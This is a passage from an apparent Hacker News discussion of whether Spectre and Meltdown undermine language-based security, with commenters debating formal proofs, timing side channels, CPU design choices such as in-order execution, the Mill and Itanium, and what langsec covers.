well-understood, if often exaggerated by naysayers, brogrammers or simply
programmers without much familiarity with them. Intuitively, it is not too
difficult to grasp the idea that formal proofs are exactly as solid as the
hardware which will run the program about which one is reasoning, and my
impression is that it was well-grasped, if begrudgingly, by the community.
(This is akin to the well-known mantra that no end-to-end encryption scheme is
invulnerable to someone looking over your shoulder and noting what keys you
type; similarly, no software-only process isolation scheme is impervious to
the hardware looking over its shoulder and "writing down" bytes someplace
where everyone can access them)
~~~
allenz
> the end of a period characterized, and not incorrectly, by the opinion that
> a safe programming language guarantees...
I don't think that there was ever such a period. Provable correctness always
had the caveat of highly idealized assumptions, and we've known from the start
that hardware vulnerabilities such as timing attacks, rowhammer, gamma rays,
and power loss can undermine those assumptions.
------
nordsieck
> Rich Hickey has this thing where he talks about "simple versus easy". Both
> of them sound good but for him, only "simple" is good whereas "easy" is bad.
I don't think I've ever heard anyone mischaracterize his talk [1] this badly.
The claim is actually that simplicity is a fundamental property of software,
whereas ease of use is often dominated by the familiarity a user has with a
particular set of tools.
[1] [https://www.infoq.com/presentations/Simple-Made-
Easy](https://www.infoq.com/presentations/Simple-Made-Easy)
~~~
spiralganglion
Agreed, but I have see a lot of people come away from the talk with an
unfortunate disdain for ease. Ironically, in disentangling "simple" and
"easy", Rich created a lot of confusion about the value of ease.
------
scott_s
My personal take is that perhaps chipmakers will start to see different market
pressures. Performance is the big one, and it's been around since the first
microprocessor. Power became increasingly more important, particularly in the
past decade, from both ends of the market. (Both mobile devices and
supercomputers are very power conscious.)
Security may become a new market pressure. You will likely sacrifice
performance to get it, as it will mean simpler cores, maybe in-order, and
probably without speculative execution. But, with simpler cores, we can
probably further increase hardware parallelism, which will only partially
mitigate the loss in single-threaded performance. Some chips may even be more
radically security conscious, and guarantee no shared caches between
processes. Such chipmakers would be able to say: we can't say for certain that
these chips are fully secure, but because they are simpler with less attack
vectors, we are far more confident they are. Security conscious chips may tend
to be the ones that are internet facing (your mobile device, cloud data
centers), and faster, less security conscious chips may only exist behind
strict firewalls.
I bring this up in response to the submitted article because I find it
unlikely that we will start to model processor insecurity at the language
level. It ruptures too many levels of abstraction. I find it more likely that
we will find ways to maintain those abstractions.
~~~
tzs
> Security may become a new market pressure. You will likely sacrifice
> performance to get it, as it will mean simpler cores, maybe in-order, and
> probably without speculative execution.
Maybe we go from having CPU + GPU to having CPU + GPU + FPU, where FPU = "Fast
Processing Unit".
The CPU in the CPU/GPU/FPU model becomes simpler. Any time we have to choose
between performance and security we choose security.
The FPU goes the other way. It is for things where speed is critical and you
either don't care if others on the machine can see your data, or you are
willing to jump through a few hoops in your code to protect your secrets.
For most of what most people do on their computers most of the time,
performance is fine without speculative execution or branch prediction and
probably even with caches that are completely flushed on every context switch.
(It will probably be fine to leave branch prediction in but just reset the
history on every context switch).
The FPU memory system could be designed so that there is a way to designate
part of FPU memory as containing secrets. Data from that memory is
automatically flushed from cache whenever there is a context switch.
~~~
sliverstorm
I believe you can make a process noncacheable today, and maybe even disable
branch prediction. This would totally shut down Spectre and Meltdown. You can
disable SMT, and there's a whole host of other things you can do to isolate
your "secure" process on an existing chip. Nobody has done these things
because they like performance.
_For most of what most people do on their computers most of the time,
performance is fine without speculative execution or branch prediction_
I think you underestimate the importance of branch prediction.
------
tdullien
I think this is too dark a post, but it shows a useful shock: Computer Science
likes to live in proximity to pure mathematics, but it lives between EE and
mathematics. And neglecting the EE side is dangerous - which not only Spectre
showed, but which should have been obvious at the latest when Rowhammer hit.
There's actual physics happening, and we need to be aware of it.
If you want to prove something about code, you probably have to prove microop
semantics upward from verilog, otherwise you're proving on a possibly broken
model of reality.
Second-order effects are complicated.
~~~
ddellacosta
Rowhammer I can understand, but how do you come to that
conclusion--"neglecting the EE side is dangerous"\--from analyzing Spectre?
Does speculative execution rely somehow on physical effects? I can't find
anything ( for example here:
[https://en.wikipedia.org/wiki/Spectre_(security_vulnerabilit...](https://en.wikipedia.org/wiki/Spectre_\(security_vulnerability\))
) that suggests there is a physical component to this vulnerability.
~~~
mst
I'd argue that using timing differences due to physical limitations of the
hardware that to exfiltrate data based on whether or not it's cached is very
definitely 'relying on physical effects'
~~~
ddellacosta
> timing differences due to physical limitations of the hardware
I see; so you're talking about step two as described here, do I have that
right?
[https://en.wikipedia.org/wiki/Spectre_(security_vulnerabilit...](https://en.wikipedia.org/wiki/Spectre_\(security_vulnerability\)#Detailed_explanation)
This seems like a failure of algorithm design to me, in the sense of not
starting with a better model that more accurately encodes the possibility of
timing attacks. That being the case it appears to me to be a problem still
firmly residing in the domain of computer science.
But, I'm a programmer, not a chip designer, and I have very little knowledge
of this field, so I'm probably biased and not thinking about this correctly or
with enough nuance.
~~~
mst
Quoting the thread root:
> Computer Science likes to live in proximity to pure mathematics, but it
> lives between EE and mathematics
which doesn't disagree with "firmly residing in the domain of computer
science" \- it's merely a question of nobody having factored the right bit of
EE into the right bit of math to get the right model.
------
perlgeek
I don't see how this is fundamentally different than timing attacks and other
side channel attacks that have been well known before, and to the best of my
knowledge, simply hasn't been the focus of the "prove it correct" approach.
Whenever you want to prove something correct, you need to make assumptions
about the execution model, and about what correctness means. Now "we" as an
industry found a bug that makes the actual model differ from the assumed
model, so we need to fix it.
The same is true when you can measure the power used by a microchip during
some cryptographic operation, and infer the secret key from that -- even if
the cryptographic operation has been proven correct, the definition of
correctness likely didn't include this factor.
------
KirinDave
While langsec can't easily mitigate spectre because the processor is trying to
hide where the performance comes from, it's worth noting that several new
languages are working on ways to write code where you can actually assert and
have the compiler check that the timing of the code you write is bounded and
uniform.
It's very easy, I think, to throw up our hands and say, "Well gosh all this
language stuff is useless because timing attacks are so scary!" But in
reality, they're pretty well studied and many of them are actually pretty
simple to understand even if they can be hard to recognize.
Both hardware AND software sides of our industry need to start taking
correctness, both at compile and runtime, seriously. The days where we can
shrug and say, "But that's too slow, don't run code you don't trust" are dead.
We killed them by ceding the idea of hardware ownership to big CSPs. The days
where we can say, "This is too complicated to do!" or "This doesn't deliver
customer value!" are also going away; the threat of combination attacks easily
overshadows any individual attack, and small vulnerabilities tend to multiply
the total surface area into truly cataclysmic proportions.
But also gone is the day when we can say things like, "Just use Haskell or
OCaml!" We've seen now what these environments offer. It's a great start and
it's paved the way for a lot of important understanding, but even that is
insufficient. Our next generation of programming environments needs to require
less abstract category theory, needs to deliver more performant code, and
needs to PROVE properties of code to the limit of runtime resolution. The
hardware and OS sides of the equation need to do the same thing. And we as
engineers need to learn these tools and their techniques inside and out; and
we shouldn't be allowed to sell our work to the general public if we don't.
~~~
zbentley
> several new languages are working on ways to write code where you can
> actually assert and have the compiler check that the timing of the code you
> write is bounded and uniform.
I'm interested in how that would avoid the halting problem. Let's say I write
code, compile it, and run some "timing verifier" on it. That verifier either
runs my code and verifies that it's timing is correct _on that run_ , or
inspects the machine code against a known specification of the hardware I'm
running it on _right then_ and ensures all of the instructions obey my timing
constraints. How would you check that the code's timing is bounded and uniform
on subsequent executions? Or on other hardware? Or in the face of
specifications that are incorrect regarding the timing characteristics of
machine code instructions (CPU/assembly language specs are notoriously
incomplete and errata-filled).
I suspect something fundamental would have to be changed about computer design
(e.g. a "CPU, report thine own circuit design in a guaranteed-accurate way")
to make something like this possible, but am not sure what that would be, or
if it's feasible.
~~~
UncleMeat
It avoids the halting problem the same way literally all sound static analysis
does. With false positives. The java type checker will reject programs that
will not have type errors at runtime. And a system that verifies timing
assertions with SMT or whatever will reject some programs that will not fail
the assertion.
The halting problem has never actually stopped static analysis tools. Static
analysis tools that check timing assertions have been around for a very long
time.
~~~
zbentley
Sure, but this isn't a static analysis tool in the same way a type system is.
This is an analysis tool which checks for mostly platform-unrelated, entirely
runtime behavior which can vary based on a lot of external factors.
When you say "Static analysis tools that check timing assertions have been
around for a very long time.", what are you referring to? I've used analyzers
that check for potentially-inescapable loops, do assembly/machine code
operation counts, and look for the presence of interruptions that are _known_
to take a potentially infinite/nondeterministic amount of time (waiting for
I/O), or ones whose _lower_ bound in time is known (scheduler interactions
like sleep). How would you analyze for instructions which have theoretically-
constant times, but which in practice are vulnerable to "constant plus or
minus"-type timing attacks like Spectre? How would that analysis yield results
we don't already know, a la "in this section of code, you should
obfuscate/prevent the gathering of timing data, and/or try to defeat
speculative execution"?
~~~
KirinDave
There is no one here saying that there is a runtime that can protect against
Spectre. Spectre is just one of extreme example of timing attacks which have
been troubling our industry for the better part of a decade.
It's entirely possible to prove that some types of code do not significantly
very they're running time based on the character of their input. A classic
example of this is hashing algorithm whose execution time is only dependent on
the length of the input.
I'm not sure if people recall password oracles but they're still valid attacks
today. We can only eliminate these by starting at the bottom and working our
way up.
If your response to Spectre is to give up on your computer security, I don't
think I want you writing software for me. These are the challenges our
industry has to face. Failure is not really an option.
------
hacknat
Everyone is assuming the author is giving up on Langsec. Read carefully, he
called Spectre/Meltdown a setback. I think he’s making a subtler point that
the fundamentals of programming have become more of a pragmatic activity than
a mathematical one, if you’re being practical about your goals that is. I’m
currently on the kubernetes multi-tenancy working group (which isn’t really a
working group yet) and its really funny to see how much effort is going into
securing containers, but core bits like the CNI receive little attention. A
wise security professional, ex hacker said that he actually liked over
engineered security systems as a hacker, because it told him what not to focus
on. Container security pretty good? Okay then figure out how to do what you
want without breaking out of the container (definitely possible in the case of
Spectre/Meltdown).
There is a fundamental cognitive bias in our field to solve the technically
challenging problems without realizing that there are practical
vulnerabilities that are far more dangerous, but a lot more boring to solve
(the most common way orgs are exploited is through a combination of social
attacks and something really trivial).
I think the author is frustrated because he feels the interesting work is
unimportant in comparison to the practical.
That isn’t to say that this work isn’t helpful. I’m very glad to be working
daily in a typesafe, memory safe language, but I have bigger fish to fry now
as a security professional on the frontline.
------
saulrh
On the one hand, langsec specifically handles these problems. A program for
searching through a file will produce the same results whether it runs in a
tenth of a second or ten seconds, and as such doesn't need to - in langsec,
shouldn't be _able_ to - access the time. That's what langsec is. It can even
identify hazards like the SharedArrayBuffer high-res timers that compare the
execution speed of different programs by communicating between processes; most
programs shouldn't care which thread finished first, so that information
shouldn't be available! And so we build formalisms for computing that don't
make that information available to the program.
On the other hand, that's probably infeasible for the real world. Humans care
about time too much for it to be declared off-limits to many programs.
Similarly with things like communicating processes. These attacks are so
fundamental that it'd be effectively impossible to build a program that didn't
throw up an impenetrable wall of critical langsec violations.
So I'm not sure. The langsec framework _does_ offer a solution. It might just
be that, in the same way that things like haskell offer their solutions, it's
too difficult for the real world to apply it.
------
willvarfar
There are CPUs that are immune to these attacks, including spectre.
The CERT recommendation was to throw away affected CPUs and use alternatives.
Now this isn't very realistic today when the in-order alternatives are slow
and not comparable performance. But it does say that CERT is not giving up on
langsec.
(Team Mill - we're immune too and will put out a light paper on how these
attacks apply to in-order processors that support speculation and what we're
doing to prevent them)
~~~
gbrown_
> Team Mill - we're immune too and will put out a light paper on how these
> attacks apply to in-order processors that support speculation and what we're
> doing to prevent them
Will this be sent to the mailing list when released?
~~~
willvarfar
Yes probably.
I've already written the paper and it's just got to survive a lot of peer
review. It turns out that it would be real easy to envisage an in-order
processor that has some mechanism for speculation that was actually vulnerable
to spectre and variations of meltdown and the paper explores that - so
hopefully it's an interesting paper even if the tl;dr is we claim to be
immune.
~~~
cwzwarich
I'm curious, because I think the Mill as described in the talks is vulnerable
to a variant of Spectre. If you have a sequence of code like this:
if (index < bounds) {
index2 = array1[index];
... array2[index2];
}
If the compiler speculates both array accesses above the bounds check, then
the first one can still succeed (i.e. not produce a NaR) while accessing
attacker-controlled memory for the value of index2.
You could obviously fix this by never generating code that does double
speculation, but you could also do that by modifying a conventional OoO
microarchitecture.
~~~
willvarfar
Spot on!
This variant of Spectre would be software bug not a hardware bug on the mill.
Our specialiser had to be fixed to _not_ produce code with this flaw.
And so we wrote a light paper on it, and perhaps a talk etc ;)
~~~
cwzwarich
It seems that Mill's combination of a single address space and speculation-
before-permissions-checks is still quite vulnerable to an ASLR leak. Have you
made any changes to mitigate this, or do you just consider address space
layout leaks acceptable behavior?
~~~
hduty
seriously? Mill is/will do speculation before perms? And here I thought turfs
were the elegant answer to this nightmare.
~~~
cwzwarich
See slide 72 of the metadata talk[1] and slide 51 of the IPC talk[2], which
indicate that it does speculation before permissions checking.
Since turf permissions operate on the granularity of an arbitrary address
range (rather than a page like traditional MMUs), the permissions cache (what
the Mill calls a PLB) has a worse latency/power tradeoff than a traditional
TLB. The Mill takes advantage of its single address space and reduces some of
this hit by doing permissions checks in parallel with the access.
[1]
[https://millcomputing.com/docs/metadata/](https://millcomputing.com/docs/metadata/)
[2] [https://millcomputing.com/docs/inter-process-
communication/](https://millcomputing.com/docs/inter-process-communication/)
~~~
willvarfar
Thank you for watching the talks! :D
Luckily its not quite as you interpreted:
The L1$D is accessed in parallel with the PLB. Both at top-level caches - one
for data, one for protection.
If there is a PLB miss we have no cache-visible side-effects until the
protection has been resolved.
The paper we're preparing will cover this in detail, because as you can see,
the talks are a bit light on exactly what happens in what order when here.
------
barbegal
One of the big problems with Spectre and Meltdown is that they are due to
behaviours and components of a processor that are not well documented. Caches,
branch predictors, out of order execution and superscalar execution are all
things that processor vendors refuse to disclose any information about because
it is so commercially sensitive. Indeed CPUs are now primarily differentiated
by these features. We are no longer getting processors with faster clocks or
even smaller transistors so a lot of research has gone into making individual
instructions run faster (or at least run faster most of the time).
Neither Intel, ARM or AMD have disclosed why their CPU design are, or are not
vulnerable to Spectre and Meltdown. If the developers of compilers or even
operating systems don't know exactly how the hardware works then it is pretty
hard for them to know that they haven't written vulnerable code. By the same
token, it is also hard for them to know if they have written performant code.
And we know even less about other types of processors that exist in almost
every chip such as GPUs, digital signal processors, video processor units
(VPUs) and other hardware accelerators. Those processors can almost certainly
also leak data from other parts of the system, they have their own caches and
sometimes branch predictors. Although it is hard to specify the code that runs
on these devices it is almost certainly still possible to exploit bugs and
timing attacks in them.
We are essentially getting security through the obscurity of the devices and
security through obscurity is no good.
So should we have processor architectures which are completely open? In some
ways that would destroy most vendor's business models. But having more
openness could lead to more divergent processor architectures as vendors try
to differentiate themselves and it should improve the security of our systems.
------
xg15
Welcome to the cyberwar.
I think the basic problem with brakdown of static analysis tools like this one
or optimisations like speculative execution is that they were built in a
different time for significantly different requirements.
When the theories were developed, the main concern was to prove correctness
and protect against accidents. Yes, the OS isolated processes from each other
and protected memory boundaries - but this was added to keep a crashing
process from corrupting other processes and bringing down the whole OS. It was
_not_ developed to contain an actively malicious process.
At some point the paradigm changed and the idea spread that an OS shouldn't
just protect against misbehaving _code_ but also against misbehaving
_programmers_. That lead to the current practice of compartmentalizing a
machine in different areas of trust and tightly restricting what a program
_can_ do - and at the same time permitting increasing amounts of "untrusted"
code to run because we trust the boundaries so much.
I think the general paradigm shift has some worrying sides, but more
importantly, it was never explicitely discussed and it was never discussed if
the current tools of software and hardware development can even support that
new paradigm.
So yeah, in short, I think we are currently discovering that our houses are in
fact not built to withstand a 20kton TNT blast set off at the front door. So
far this hadn't been a problem as random violent explosions used to be a rare
occurence. Somehow we got ourselves in a situation where they aren't rare
anymore.
------
qubex
Am I wrong in recalling that Itanium (IA-64) was an in-order architecture that
relied on the compiler to explicate the potential for parallelism? Again, if I
recall correctly, the struggle to construct compilers that could do this
versus the apparent success (and lack of trade-offs) in letting in-processor
circuitry to reshuffle instructions at run-time was one of the main reasons
why _x_ 86’s 64-bit extensions prevailed (the other being poor performance
when running legacy _x_ 86 32-bit code).
Now it turns out that we really were benefitting from an advantage that had a
hidden cost, not in terms of performance (though power might be a concern) but
in terms of breaking the implicit model we have of how software executes, and
that this disconnect in turn opens us to a host of “architectural” risks and
metaphor breakages.
Maybe at this point we should consider reverting to the original plan and
insist on compilers doing the legwork, so that approaches such as langsec have
a hope of succeeding. Systems must be comprehensible (at least in principle)
and reliably deterministic from the top all the way to the bottom.
~~~
gpderetta
Itianium relies on advance loads which is a form of speculation introduced by
the compiler to perform competitively. It is not unlikely that this is as
exploitable as spectre.
~~~
qubex
I respectfully disagree for two main reasons. Firstly, because the compiler is
not transversal to all processes currently executing on the system at runtime,
so it isn’t a ”unifying step” that conjoins otherwise independent processes
and can allow them to interact. Secondly, if the compiler were found to be
leaking state between processes, simply changing the compiler’s logic would
allow rectification of these issues (albeit at the expense of recompiling all
software with the new compiler), with circuits etched onto a processor die one
has no such opportunity. What could be (at least potentially) an open-source
fix becomes the umpteenth binary blob from an opaque entity that tell us to
”trust them because [they] know best”.
~~~
gpderetta
Spectre is not (at least not directly), a cross address space vulnerability
(although it can be exploited in some cases from other address spaces).
A JS JIT running on itanium that generates advanced loads before bounds checks
will be vulnerable.
It is true that it can be fixed purely by software changes, by simply avoiding
issuing advanced loads [1], but then again software changes can also plug the
spectre v1 vulnerability on OoO architectures by adding artificial
dependencies on load-load sequences (see the WebKit mitigation article that
was discussed here a few days ago). Both software fixes have potentially
significant performance issues (more so on in-order architectures).
So yeah, in-order CPUs are less microarchitecturally vulnerable [2] to spectre
by default, but the compiler tricks required to make them competitive with OoO
CPUs might reintroduce the issue.
[1] In principle compiler issued prefetches and load hoisting can be an issue
on OoO CPUs as well, but as these are less important for performance compilers
can be more conservative. On the other hand some VLIW architectures have
special instructions and architectural support (like Itanium ALAT) to make
this load hoisting easier.
[2] There are in-order ARM CPUs that have been reported to be affected though.
~~~
gpderetta
Thinking more about this, the vulnerability would be in any load issued
speculatively which whose address depends on the result of a previous load.
This can be detected at compile time and avoiding just this scenario it will
not have such a performance effect as avoiding any speculative load.
------
urbit
Here's a more optimistic take which is unavoidably a plug.
Urbit is maybe a sort of "extreme langsec." "Immune" is a dangerous word.
Urbit is "premitigated" against Spectre for the following reasons, some cool
and others stupid:
(1) The Nock VM has no O(n) data structures, ie, arrays. This was not anything
to brag about till now.
(2) Urbit events are interpreted in their own process, which is one trust
domain (one process, one "personal server").
(3) A personal server isn't a browser and doesn't habitually run code its
owner doesn't trust.
(4) Urbit is purely functional, so you only know the time if someone passes
you the time.
(5) Top-level event handlers are passed the time of the event. This is easy to
fuzz.
(6) If you are running untrusted foreign code, it is probably just a function.
Giving this function a measured time interval from top-level event times would
be strange. And it would need another channel to exfiltrate the stolen data.
Never say never, but this combination of premitigations makes me worry about
Spectre very little. Although, when we do have a less-trusted tier of
applications (walk before run), ain't nobody is going to be telling them the
time.
Besides the plug, the lesson there is that one of the reasons Spectre is a
problem is that langsec is an imperfect bandaid.
Urbit is premitigated because it was designed as a functional system from the
ground up. The JS environment is functional lite -- it allows typeless
functional programming, but it also retains many mutable/imperative systems
design tropes.
It's these tropes that have become clever attack vectors. If you don't want to
get Spectred, build systems that are formal and functional all the way down.
~~~
drbawb
>(5) Top-level event handlers are passed the time of the event. This is easy
to fuzz.
Therein lies the rub -- if your program does not have access to precise timing
information, it is by definition not operating at the full capability of the
hardware which runs it. That's a hard sell to many domains.
Consider gaming. At 144Hz w/ 4K resolution you have 6ms to render a frame:
that's about 1.3ns per pixel. If for a moment we imagine that it takes
approximately 1 machine cycle per pixel to render a scene: that means you need
to be operating at 1.3GHz just to meet the deadline for drawing to the frame
buffer. -- That's before you consider memory & cache latency, or the fact that
your multitasking OS is stealing resources for itself & other competing
processes.
So no, one cannot just fuzz performance counters in the name of security. Any
soft-realtime or hard-realtime domain is going to expect the machine to
actually perform as advertised.
~~~
tartis
You are right: by definition real-time tasks will always be vulnerable.
With regard to Urbit, it is a non-issue because there are no use cases which
would warrant access to soft or hard-realtime for a networked OS.
Such tasks will always happen on client-side, by virtue of network latency.
------
zbentley
> Spectre shows us that the building blocks provided to us by Intel, ARM, and
> all the rest are no longer "small parts understood entirely"; that instead
> now we have to do "basic science" on our CPUs and memory hierarchies to know
> what they do.
I object to the term "no longer" in that sentence. There exist old CPUs that
are not vulnerable to these attacks, but their existence doesn't mean that
when those CPUs were in widespread use they were "understood entirely". I
imagine that most programmers affected by the F00F vulnerability in Pentiums
didn't fully understood what it was about the chip/microcode that caused the
lockup, either.
The parts being assembled change over time, but I think you can always say
"bah, {kids|engineers|scientists|etc} nowadays don't know how the things
they're plugging together work" and be trivially "correct" without making any
constructive point about how to go back to some nonexistent past in which
things were understood. Even when computers ran on vacuum tubes and physical
insects in machines as "bugs"
([apocryphal]([https://www.computerworld.com/article/2515435/app-
developmen...](https://www.computerworld.com/article/2515435/app-
development/moth-in-the-machine--debugging-the-origins-of--bug-.html)), I
know), people didn't know the composition of the hardware. Would one of those
programmers, on average, be more likely to fully understand, say the heat
range required for successfully making circuits in a tube or the effects of
anode corrosion on the lifespan of a tube, than a modern-day program would
understand how CPU microcode works?
The amount of complexity per part might go up over time. But there's always a
specialized threshold for "low level" understanding below which a) most people
don't operate and b) dragons lurk.
------
jokoon
I find weird and worrying that you cannot analyze the safety of a program
easily with some form of static analysis, or that there is no solution to do
an automated security audit.
I have been bragging for a long time that there are no organized effort
(state, government, scholars or otherwise) to teach basic software security in
programming. There are no ISO standard for computer security, or at least
there is nothing really relevant being taught. Security certifications don't
really mean anything, or it seems nobody cares enough.
I guess governments will have to get preoccupied with those things, because
you can clearly see that for now, it's an arms race kind of strategy, as long
as the NSA has the upper hand, things are okay, but if it becomes a bigger
national security concern, things might change. I guess you can smell that the
russians are getting good enough and that it's time to make internet security
a more prevalent matter for developers.
~~~
qubex
How can you hope to statically analyse something that executes non-
deterministically and whose state depends on the goings-on of all the
processes simultaneously hosted on that system? The whole point the author is
making is that there is a step at the bottom of all formal reasoning
hierarchies that doesn’t behave deterministically and thus undermines formal
reasoning about everything built above it. It’s just that we had never
recognised it as existing because we conveniently abstracted away this
reordering of instructions and thus had a model of the runtime environment
that doesn’t match with reality.
------
coldtea
> _Mathematically, in terms of the semantics of e.g. JavaScript, these attacks
> should not be possible. But practically, they work._
Obviously this is badly stated.
It's not correct to say "mathematically they should be possible given the
semantics of Javascript" and then say that "practically they work" as if
implying that the mathematics somehow broke down.
It's not the mathematics that failed you, but the assumptions (axioms) you've
used. Mathematically they are absolutely possible -- when you correctly
account for the real processor behavior. And if you had mathematically modeled
the whole "JS semantics + CPU behavior" accounting for Meltdown, mathematics
would have shown that it's not safe.
------
nine_k
Spectre has nothing to do with program correctness or safety. It has
everything to do with _hardware 's_ correctness and safety.
That is, the basic premise of hardware process isolation is that a process
cannot have any knowledge of what another process is doing, or whether it even
exists, unless it is explicitly permitted (e.g. the OS offers an API to look
at processes).
This basic premise is now broken: enough information leaks via timing as to
allow to read arbitrary memory regions. It's like you built a house laying
bricks in a formally correct way, but the walls proved to be permeable because
the bricks themselves have a flaw.
Since this flaw is not fundamental, that is, not even every currently existing
processor exhibits it, it appears to be reasonable to replace the flawed
design of the bricks, and not to re-engineer house construction.
There is a nice quote in the article, about doing basic science to find out
how software (and hardware) _actually_ works, since specs are badly
incomplete. It can be matched with another, earlier famous quote: "Beware of
this code; I only proved it correct, I did not test it." Black-box testing of
information systems is not going anywhere, formal methods or not; at the very
least, we need evidence that formal methods were not visibly mis-applied, and
also evidence that other basic premises, like those of hardware, still hold.
Because sometimes they don't.
~~~
ajross
> Spectre has nothing to do with program correctness or safety. It has
> everything to do with hardware's correctness and safety.
Yes, but safety is safety. The point of the article is that the assumption on
the part of language nerds for the past few decades -- that correct choice of
processes and implementation patterns as expressed by whatever favorite
runtime the author wants can protect us from security bugs -- turns out to be
_FALSE_.
Rust and Haskell programs are subject to Spectre attacks just as badly as K&R
C ones from 1983. All that pontification didn't actually work!
The point is that it puts a limit on pedantry about "correctness". That's all
based on an idea about a "computer" being an abstracted device, when it turns
out the real-world machines are in fact leaky abstractions. The lesson to my
ears isn't that you shouldn't use Rust or whatever, but that some humility
about the boundaries of "correctness" would probably be a good idea for many
of the pontificators.
~~~
kibwen
_> All that pontification didn't actually work!_
This is a bit silly. Security is a chain that is only as strong as its weakest
link. For decades we believed that C was the weakest link, and now, with
Spectre, we have discovered (drumroll, please!): nah, C is still the weakest
link. For all the amazingly scary things that Spectre brings to the table,
it's still less scary than Heartbleed and Cloudbleed were.
Don't get me wrong, hardware still sucks (and with Intel and AMD's growing
body of management engine incompetence they may yet overtake C as the weakest
link in the chain) but we will learn from this and get better. In the
meantime, we need to be pushing forward on all fronts: hardware security,
language security, kernel security, application security, network security...
nobody gets to stand still.
~~~
wahern
Long before Heartbleed or Cloudbleed researchers (and presumably attackers)
were using remote timing attacks to extract secret keys:
https://crypto.stanford.edu/~dabo/papers/ssl-timing.pdf
And most big data breaches where information assets are actually stolen
involve services written using "safe" languages, like Java or SQL.
And even if C is the weakest link, all that means is that you're totally
screwed. No amount of Rust will save you when the Linux kernel, your
relational database, and every router between you and the attacker are written
using C or assembly.
At the end of the day, if you want strong security assurances you need to
prove the correctness of all the semantics (of which memory bounds
constraining is but one small aspect) of every piece of software in your
stack, or at the very least all the most critical pieces. And the best tooling
for that is for Ada and C.
------
rwj
The opening line that "The work of engineers used to be about taking small
parts that they understood entirely and using simple techniques to compose
them into larger things that do what they want" is not correct. Emergent
behaviour has always been an issue for complex system. Just look at the story
behind the Tacoma Narrows Bridge.
Computing is extremely complex, so the issue is probably more acute, but it is
not unique.
~~~
calebm
I agree with you. Engineers of physical things don't fully understand what
steel is made of (since we don't fully understand the lowest underpinnings of
matter or all of its properties).
------
musha68k
OK so do we finally get proper lisp machines now?
~~~
SomeHacker44
Lisp machines (at least, Symbolics Lisp Machines which I know well) didn't
suffer from these flaws. They were largely designed to be single-user machines
and there was literally almost no isolation between anything!
~~~
AnimalMuppet
But weren't Symbolics Lisp Machines from an era where _nothing_ suffered from
these flaws, because nothing did speculative execution?
~~~
SomeHacker44
As far as I know, this is true for the Symbolics Ivory CPUs, yes. That said,
these flaws would be irrelevant, if so, because the system built upon the
hardware did not enforce modern process isolation paradigms.
------
agentultra
Security by proof, model checking, semantics is still a good, effective tool!
Leveraging the type system is a good communication channel for programmers
maintaining the system.
Proofs and models of the protocols are still important.
But yes... we still need to fix CPUs. And the class of errors (those of
omission) are still worth removing from our code regardless of spectre or
meltdown.
------
realandreskytt
Security is an emergent property of a system consisting of users, software and
hardware. Thus, a programmer cannot prove security of a system but merely
assert its certain behaviour. Langsec does just that. No, it can never be used
to build secure systems. Yes, it can be used to solve practical problems
making things more secure.
------
chubot
The author of this post isn't properly characterizing langsec:
_The basis of language security is starting from a programming language with
a well-defined, easy-to-understand semantics. ... This approach is taken, for
example, by Google 's Caja compiler to isolate components from each other,
even when they run in the context of the same web page._
From what I can tell, he's talking about the broader area of "programming
languages and security". That is not the same thing as
[http://langsec.org/](http://langsec.org/), which is essentially about using
grammars to recognize network PROTOCOL formats.
As far as I remember, one motivating vulnerability is that there were two
different parsers for SSL certificates, which allowed attackers to trick
browsers into accepting invalid certificates. That doesn't have anything to do
with programming languages per se; you can write this vulnerability in any
language. It's analogous to the fact that using a safe language doesn't
prevent you from SQL injection.
Some examples of what they are trying to address:
[http://langsec.org/papers/langsec-cwes-
secdev2016.pdf](http://langsec.org/papers/langsec-cwes-secdev2016.pdf)
I wrote a critique of langsec a few months ago here:
[https://lobste.rs/s/uyjzjc/science_insecurity_meredith_l_pat...](https://lobste.rs/s/uyjzjc/science_insecurity_meredith_l_patterson#c_pzjzxh)
tl;dr I think they are using the wrong formalisms.
I found it odd that the author was assuming that langsec is a widely used
thing when I think it is nascent research.
Even Google Caja, a totally different project outside of langsec, is not
widely deployed, although I very much like its ideas.
~~~
maradydd
Just FTR, your critique is answered by Stefan Lucks, Norina Grosch, and Joshua
Koenig's paper[0] from last year's langsec workshop at IEEE Security and
Privacy. They define a formalism, calc-regular languages, to handle length-
prefixed strings.
[0] [http://spw17.langsec.org/papers.html#calc-
regular](http://spw17.langsec.org/papers.html#calc-regular)
~~~
chubot
Thanks, this looks promising! I'll take a look.
------
titzer
Hi Andy, thanks for writing this.
I don't think we are fundamentally hopeless for "langsec", although history
will definitely be divided into two Epochs: a time before Spectre and a time
after.
Language runtimes and operating systems just got some really great new
research problems, and a lots of interesting ideas are afoot (many in V8
land).
~~~
UncleMeat
There is no way that this is true. The program analysis community has known
for decades that systems were only ever sound w.r.t. some assumptions. See
Andrew Appel's paper on breaking java safety with mcdonalds heat lamps from
like a decade ago for a fun example.
Basically every static analysis person I've talked to about this agrees that
it is a really really cool attack but that it doesn't represent fundamental
new information for the field.
------
stmw
I think there is a deeper truth here - understanding of what the hardware is
doing has always been essential for writing correct, secure, performant
programs - and it is the (IMHO, mistaken) ideology that this is not the case
that took the biggest hit from Spectre/Meltdown/et al.
------
kibwen
_> One manifestation of the Spectre vulnerability is that code running in a
process can now read the entirety of its address space, bypassing invariants
of the language in which it is written, even if it is written in a "safe"
language. This is currently being used by JavaScript programs to exfiltrate
passwords from a browser's password manager, or bitcoin wallets._
Isn't this incorrect? I thought it was Meltdown, not Spectre, that was being
used to read the browser's password manager from JavaScript, and that Spectre-
via-Javascript was limited to reading data within the same JS VM process (so
e.g. you could prevent Spectre from reading cookies by making them http-only).
This matters because meltdown is much easier to patch than Spectre.
------
workthrowaway27
This is like saying a compiler bug in a safe language ends langsec. Which is
obviously absurd. It means the implementation had a flaw, but that doesn't
make the whole thing worthless. And when the flaw is fixed the same guarantees
are restored.
~~~
madez
The problem is that what you call guarantees weren't guarantees to begin with,
and we can't be sure they are now.
~~~
workthrowaway27
That's true about any engineering artifact though. If your steel rebar isn't
built to whatever standard you require your concrete skyscraper isn't going to
be structurally sound. To build on top of the layers below you, you have to
trust that they work, and when problems occur you fix the problems as they
come up (or ideally prevent them ahead of time).
------
ngneer
I am not seeing the connection to LANGSEC. The Spectre and Meltdown attacks
turn the processor into a confused deputy, that is all. If anything, this is
predicted by LANGSEC. The beef is not even with hardware verification, as some
have suggested, because the specification never calls for such security
guarantees. The specification is architectural because we want different
processors to implement the same architecture, such that they are compatible.
The only reason transient instruction sequences have security violating side
effects is microarchitectural leaks.
------
tannhaeuser
